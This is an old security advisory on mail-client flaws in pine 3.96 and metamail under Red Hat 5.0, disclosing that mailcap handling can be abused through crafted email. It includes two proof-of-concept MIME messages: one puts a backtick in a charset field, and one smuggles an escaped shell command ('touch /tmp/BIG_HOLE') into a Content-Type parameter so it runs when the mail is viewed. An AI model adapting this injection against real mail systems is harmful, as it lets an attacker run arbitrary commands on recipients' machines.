COMMAND

    mailcap

SYSTEMS AFFECTED

    Linux RedHat 5.0 (others?)

PROBLEM

    Michal Zalewskifound following.   Many of mailcap-compatible  unix
    mail clients have  several security holes.   Mailcap mechanism  is
    usually so poorly implemented  that it's possible to  perform wide
    range  of  attacks  -  from  'harmless' messing on screen, through
    executing  specific  commands  with  arbitrary parameters, even to
    executing *arbitrary* commands  via e-mail message.   Here are  an
    examples, both  tested under  Linux RH  5.0 distribution  (mailcap
    1.0.6, pine 3.96).

    Example 1 (light) - pine 3.96 confusion
    =======================================
    Following example demostrates how to cause a few 'mostly harmless'
    errors due to the improper expansion of ` character by pine - it's
    just annoying, because you can't view this mail properly:

    MIME-Version: 1.0
    Content-Type: multipart/alternative;
            boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

    ------=_NextPart_000_0007_01BD5F09.B6797740
    Content-Type: text/plain;
            charset="crashme`"
    Content-Transfer-Encoding: quoted-printable

    Hellow!

    ------=_NextPart_000_0007_01BD5F09.B6797740--

    Example 2 (heavy) - execution of arbitrary code
    ===============================================
    That's something even more  dangerous - following MIME  mail, when
    viewed,  executes  'touch  /tmp/BIG_HOLE'  (bug  lies  in metamail
    script):

    MIME-Version: 1.0
    Content-Type: multipart/alternative;
            boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

    ------=_NextPart_000_0007_01BD5F09.B6797740
    Content-Type: default;
            encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"
    Content-Transfer-Encoding: quoted-printable

    Hellow!!!

    ------=_NextPart_000_0007_01BD5F09.B6797740--

SOLUTION

    Perhaps newer release of mailcap will get this right.